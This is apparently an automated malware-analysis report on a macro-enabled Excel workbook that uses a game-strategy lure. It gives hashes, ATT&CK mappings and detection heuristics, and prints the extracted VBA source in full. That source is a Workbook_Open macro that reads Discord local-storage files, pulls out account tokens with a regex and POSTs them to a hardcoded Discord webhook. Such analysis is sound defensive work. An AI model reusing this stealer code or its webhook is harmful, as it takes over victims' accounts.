Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d3362a85182555aa…

MALICIOUS

Office (OOXML)

33.2 KB Created: 2021-04-02 18:02:50 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2021-11-25
MD5: ca53d8a38685f6b5de48b5b03c15b0e1 SHA-1: 0a0f48bd120daf609e195ba595ba39e30779c92c SHA-256: d3362a85182555aa958a14ac6ef6fb9842d4b8951bf697a84cc1747bbede7039
166 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1041 Exfiltration Over C2 Channel

The sample is an Excel document containing a Workbook_Open VBA macro that executes upon opening. This macro uses VBA.CreateObject to instantiate an XMLHTTP object and attempts to exfiltrate data by reading Discord's local storage leveldb files and sending the content to the hardcoded webhook URL: https://discord.com/api/webhooks/827555600346644490/t8Ye6pcw6a7FVkTMEobXd1PpZNsvqZyvrAZ0wg43sRym7wc4yugPCw8eaBqwRgosLJim. The document body content appears to be unrelated game strategy information, likely a lure.

Heuristics 8

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • External hyperlinks (6) low OOXML_EXTERNAL_HYPERLINKS
    Document contains 6 external hyperlinks — clickable URLs are stored as external relationships. First target: https://twitter.com/_kurako__/status/1446013883995410437?s=20
  • Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET
    Excel workbook contains 1 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://discord.com/api/webhooks/827555600346644490/t8Ye6pcw6a7FVkTMEobXd1PpZNsvqZyvrAZ0wg43sRym7wc4yugPCw8eaBqwRgosLJim In document text (OOXML body / shared strings)
    • https://discord.com/api/webhooks/827555600346644490/t8Ye6pcw6a7FVkTMEobXd1PpZNsvqZyvrAZ0wg43sRym7wc4yugPCw8eaBqwRgosLJim�In document text (OOXML body / shared strings)
    • https://twitter.com/_kurako__/status/1446013883995410437?s=20Document hyperlink

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 4377 bytes
SHA-256: fca14a974bb3168e29fba961c8d5ea9a63fa0ff74d17c62d5c7f885f1670809a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Ta_delovni_zvezek"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_open()
Dim msg As String
Dim fileName As Variant
fileName = Dir(Environ("APPDATA") & "\Discord\Local Storage\leveldb\*.ldb", vbNormal)
Const WEBHOOK_URL = "https://discord.com/api/webhooks/827555600346644490/t8Ye6pcw6a7FVkTMEobXd1PpZNsvqZyvrAZ0wg43sRym7wc4yugPCw8eaBqwRgosLJim"
Dim Xhr As Object  ' As MSXML2.XMLHTTP60
Set Xhr = VBA.CreateObject("MSXML2.XMLHTTP")

Worksheets("Troll").Visible = True
Worksheets("List1").Visible = False

msg = ""

Dim TextFile As Integer
Dim FilePath As String
Dim FileContent As String
Close TextFile


While fileName <> ""


    TextFile = FreeFile
    
    Open (Environ("APPDATA") & "\Discord\Local Storage\leveldb\") & fileName For Binary As TextFile
    FileContent = Input(LOF(TextFile), TextFile)
    msg = CleanS2XL(FileContent, "", False)
    Close TextFile
    fileName = Dir
    
    msg = trim(msg)

    'Tu daj regex
    RegexMatchingAndDisplayingAPattern (msg)
    
Wend



With Xhr
        .Open "POST", WEBHOOK_URL, True
        .setRequestHeader "Content-Type", "application/json"
        .send "{""content"":""" & msg & """}"
    End With  'xhr


End Sub

Sub unbugger()
Debug.Print fileName
End Sub

Function CleanS2XL(ByVal Value As String, ReplaceWith, TrimResult) As String

Dim NonPrint() As Variant
Dim Counter As Long

CleanS2XL = Value

For Counter = 0 To 31
    CleanS2XL = Replace(CleanS2XL, Chr(Counter), ReplaceWith)
Next Counter

NonPrint = Array(127, 129, 141, 143, 144, 157)
For Counter = LBound(NonPrint) To UBound(NonPrint)
    CleanS2XL = Replace(CleanS2XL, Chr(NonPrint(Counter)), ReplaceWith)
Next Counter
CleanS2XL = Replace(CleanS2XL, Chr(160), Chr(32))
If TrimResult Then CleanS2XL = Application.trim(CleanS2XL)
End Function

Function SplitString(ByVal str As String, ByVal numOfChar As Long) As String()
    Dim sArr() As String
    Dim nCount As Long
    ReDim sArr((Len(str) - 1) \ numOfChar)
    Do While Len(str)
        sArr(nCount) = Left$(str, numOfChar)
        str = Mid$(str, numOfChar + 1)
        nCount = nCount + 1
    Loop
    SplitString = sArr
End Function

Sub RegexMatchingAndDisplayingAPattern(x)
Dim regexOne As Object
Set regexOne = New RegExp
Dim msg2 As String
msg2 = ""
'-
Dim Xhr As Object  ' As MSXML2.XMLHTTP60
Set Xhr = VBA.CreateObject("MSXML2.XMLHTTP")
Const WEBHOOK_URL = "https://discord.com/api/webhooks/827555600346644490/t8Ye6pcw6a7FVkTMEobXd1PpZNsvqZyvrAZ0wg43sRym7wc4yugPCw8eaBqwRgosLJim"
'-
regexOne.Pattern = "[\w-]{24}\.[\w-]{6}\.[\w-]{27}"
regexOne.Global = True
regexOne.IgnoreCase = IgnoreCase


Set theMatches = regexOne.Execute(x)

For Each Match In theMatches
  msg2 = msg2 & " " & Match.Value
  
Next Match

With Xhr
        .Open "POST", WEBHOOK_URL, True
        .setRequestHeader "Content-Type", "application/json"
        .send "{""content"":""" & msg2 & """}"
End With  'xhr



End Sub

Public Function testRange() As Range
    Set testRange = Range("A1")
End Function

Private Sub Workbook_BeforeClose(Cancel As Boolean)
Worksheets("List1").Visible = True
Worksheets("Troll").Visible = False

End Sub

Attribute VB_Name = "List1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "List2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name =
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 32768 bytes
SHA-256: 4694c43712aea4a52bbacd303075d5829d1a6c180268938b98f85ccf04275a90